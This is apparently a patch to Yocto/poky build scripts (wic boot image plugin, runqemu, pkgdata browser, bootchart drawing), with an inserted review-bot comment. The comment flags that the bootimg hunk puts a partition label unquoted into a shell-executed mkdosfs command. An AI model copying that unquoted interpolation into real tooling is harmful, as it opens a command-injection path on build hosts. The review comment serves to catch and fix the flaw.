+++ b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py @@ -186,8 +186,10 @@ class BootimgPcbiosPlugin(SourcePlugin): # dosfs image, created by mkdosfs bootimg = "%s/boot%s.img" % (cr_workdir, part.lineno) - dosfs_cmd = "mkdosfs -n boot -i %s -S 512 -C %s %d" % \ - (part.fsuuid, bootimg, blocks) + label = part.label if part.label else "boot" + + dosfs_cmd = "mkdosfs -n %s -i %s -S 512 -C %s %d" % \ + (label, part.fsuuid, bootimg, blocks) exec_native_cmd(dosfs_cmd, native_sysroot) mcopy_cmd = "mcopy -i %s -s %s/* ::/" % (bootimg, hdddir) diff --git a/poky/scripts/oe-pkgdata-browser b/poky/scripts/oe-pkgdata-browser index 8d223185a4..65a6ee956e 100755 --- a/poky/scripts/oe-pkgdata-browser +++ b/poky/scripts/oe-pkgdata-browser @@ -236,6 +236,8 @@ class PkgUi(): update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False) def load_recipes(self): + if not os.path.exists(pkgdata): + sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata) for recipe in sorted(os.listdir(pkgdata)): if os.path.isfile(os.path.join(pkgdata, recipe)): self.recipe_iters[recipe] = self.recipe_store.append([recipe]) diff --git a/poky/scripts/pybootchartgui/pybootchartgui/draw.py b/poky/scripts/pybootchartgui/pybootchartgui/draw.py index 29eb7505bc..fc708b55c3 100644 --- a/poky/scripts/pybootchartgui/pybootchartgui/draw.py +++ b/poky/scripts/pybootchartgui/pybootchartgui/draw.py @@ -267,7 +267,10 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range): # avoid divide by zero if max_y == 0: max_y = 1.0 - xscale = float (chart_bounds[2]) / (max_x - x_shift) + if (max_x - x_shift): + xscale = float (chart_bounds[2]) / (max_x - x_shift) + else: + xscale = float (chart_bounds[2]) # If data_range is given, scale the chart so that the value range in # data_range matches the chart bounds exactly. # Otherwise, scale so that the actual data matches the chart bounds. 
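Review bot: In the bootimg-pcbios.py hunk, `part.label` is now interpolated unquoted into `dosfs_cmd`, and exec_native_cmd() runs its command through a shell (`_exec_cmd(native_cmd_and_args, True)` in wic/misc.py). A label containing spaces or shell metacharacters would change the command that is executed rather than just the volume name. Whether labels are validated when the .wks file is parsed is not visible in this hunk; if they are not, quote the value, e.g. `label = shlex.quote(part.label or "boot")` with `import shlex` at the top of the file. The enclosing method starts and ends outside the hunk.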
diff --git a/poky/scripts/runqemu b/poky/scripts/runqemu index 10880ba6bb..51607f10e5 100755 --- a/poky/scripts/runqemu +++ b/poky/scripts/runqemu @@ -1516,7 +1516,8 @@ def main(): def sigterm_handler(signum, frame): logger.info("SIGTERM received") - os.kill(config.qemupid, signal.SIGTERM) + if config.qemupid: + os.kill(config.qemupid, signal.SIGTERM) config.cleanup() # Deliberately ignore the return code of 'tput smam'. subprocess.call(["tput", "smam"]) diff --git a/poky/scripts/wic b/poky/scripts/wic index a741aed364..6547abe0e9 100755 --- a/poky/scripts/wic +++ b/poky/scripts/wic @@ -22,9 +22,9 @@ import sys import argparse import logging import subprocess +import shutil from collections import namedtuple -from distutils import spawn # External modules scripts_path = os.path.dirname(os.path.realpath(__file__)) @@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'): break sdkroot = os.path.dirname(sdkroot) -bitbake_exe = spawn.find_executable('bitbake') +bitbake_exe = shutil.which('bitbake') if bitbake_exe: bitbake_path = scriptpath.add_bitbake_lib_path() import bb |